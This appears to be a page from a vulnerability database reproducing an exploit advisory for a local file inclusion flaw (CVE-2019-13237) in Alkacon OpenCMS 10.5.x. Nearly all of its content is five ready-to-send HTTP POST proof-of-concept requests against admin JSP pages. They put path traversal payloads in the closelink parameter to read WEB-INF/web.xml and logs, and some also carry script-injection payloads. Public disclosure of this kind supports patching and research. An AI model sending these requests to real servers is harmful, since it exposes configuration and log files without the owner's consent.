Index
Bugtraq
Pełna lista
Błędy
Sztuczki
Exploity
Dorks list
Tylko z CVE
Tylko z CWE
Bogus
Ranking
CVEMAP
Świeża lista CVE
Producenci
Produkty
Słownik CWE
Sprawdź nr. CVE
Sprawdź nr. CWE
Szukaj
W Bugtraq
W bazie CVE
Po autorze
Po nr. CVE
Po nr. CWE
Po producencie
Po produkcie
RSS
Bugtraq
CVEMAP
CVE Produkty
Tylko Błędy
Tylko Exploity
Tylko Dorks
Więcej
cIFrex
Facebook
Twitter
Donate
O bazie
Lang
Polish
English
Submit
Alkacon OpenCMS 10.5.x Local File inclusion
2019.09.10
Credit:
Aetsu
Risk:
Medium
Local:
No
Remote:
Yes
CVE:
CVE-2019-13237
CWE:
CWE-98
Ogólna skala CVSS:
4/10
Znaczenie:
2.9/10
Łatwość wykorzystania:
8/10
Wymagany dostęp:
Zdalny
Złożoność ataku:
Niska
Autoryzacja:
Jednorazowa
Wpływ na poufność:
Częściowy
Wpływ na integralność:
Brak
Wpływ na dostępność:
Brak
# Exploit Title: Alkacon OpenCMS 10.5.x - Multiple LFI in Alkacon OpenCms Site Management # Google Dork: N/A # Date: 18/07/2019 # Exploit Author: Aetsu # Vendor Homepage: http://www.opencms.org # Software Link: https://github.com/alkacon/opencms-core # Version: 10.5.x # Tested on: 10.5.5 / 10.5.4 # CVE : CVE-2019-13237 For the tests, I used the payloads: ``` …%2f…%2fWEB-INF%2flogs%2fopencms.log …%2f…%2fWEB-INF%2fweb.xml ``` 1. Affected resource closelink: POC: ``` POST /system/workplace/admin/workplace/loginmessage.jsp HTTP/1.1 Host: example.com enabled.0=true&enabled.0.value=true&message.0=%3Cimg+src%3D.+onerror%3Dalert%281%29%3E%0D%0A&loginForbidden.0.value=false&timeStart.0=1%2F3%2F2000+12%3A00+AM&ok=Ok&elementname=undefined&path=%252Fworkplace%252Floginmessage&elementindex=0&action=save&closelink=..%2f..%2fWEB-INF%2fweb.xml&style=new&page=page1&framename= ``` 2. Affected resource closelink: POC: ``` POST /system/workplace/admin/contenttools/reports/xmlcontentrepair.jsp HTTP/1.1 Host: example.com reporttype=extended&reportcontinuekey=&thread=dcbb6737-661b-11e9-a9fc-0242ac11002b&threadhasnext=false&action=reportend&closelink=..%2f..%2fWEB-INF%2fweb.xml&style=new&ok=Ok ``` 3. Affected resource closelink: POC: ``` POST /system/workplace/admin/accounts/group_new.jsp HTTP/1.1 Host: example.com name.0=%3Cimg+src%3D.+onerror%3Dalert%28%27Name%27%29%3E&description.0=%3Cimg+src%3D.+onerror%3Dalert%28%27Description%27%29%3E&assignedOu.0=root+organizational+unit+%28%2F%29&enabled.0=true&enabled.0.value=true&ok=Ok&oufqn=&elementname=undefined&path=%252Faccounts%252Forgunit%252Fgroups%252Fnew&elementindex=0&action=save&closelink=..%2f..%2fWEB-INF%2fweb.xml&style=new&page=page1&framename= ``` 4. Affected resource closelink: POC: ``` POST /system/workplace/admin/history/settings/index.jsp HTTP/1.1 Host: example.com versions.0=10&mode.0=2&ok=OK&elementname=undefined&path=%252Fhistory%252Fsettings&elementindex=0&action=save&closelink=..%2f..%2fWEB-INF%2fweb.xml&style=new&page=page1&framename= ``` 5. Affected resource closelink: POC: ``` POST /system/workplace/admin/history/reports/clearhistory.jsp HTTP/1.1 Host: example.com reporttype=extended&reportcontinuekey=&thread=ac0bbd5f-66cd-11e9-ae09-0242ac11002b&classname=org.opencms.workplace.tools.history.CmsHistoryClearDialog&threadhasnext=false&action=reportend&closelink=..%2f..%2fWEB-INF%2fweb.xml&style=new&ok=OK ``` Extended POCs: https://aetsu.github.io/OpenCms
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top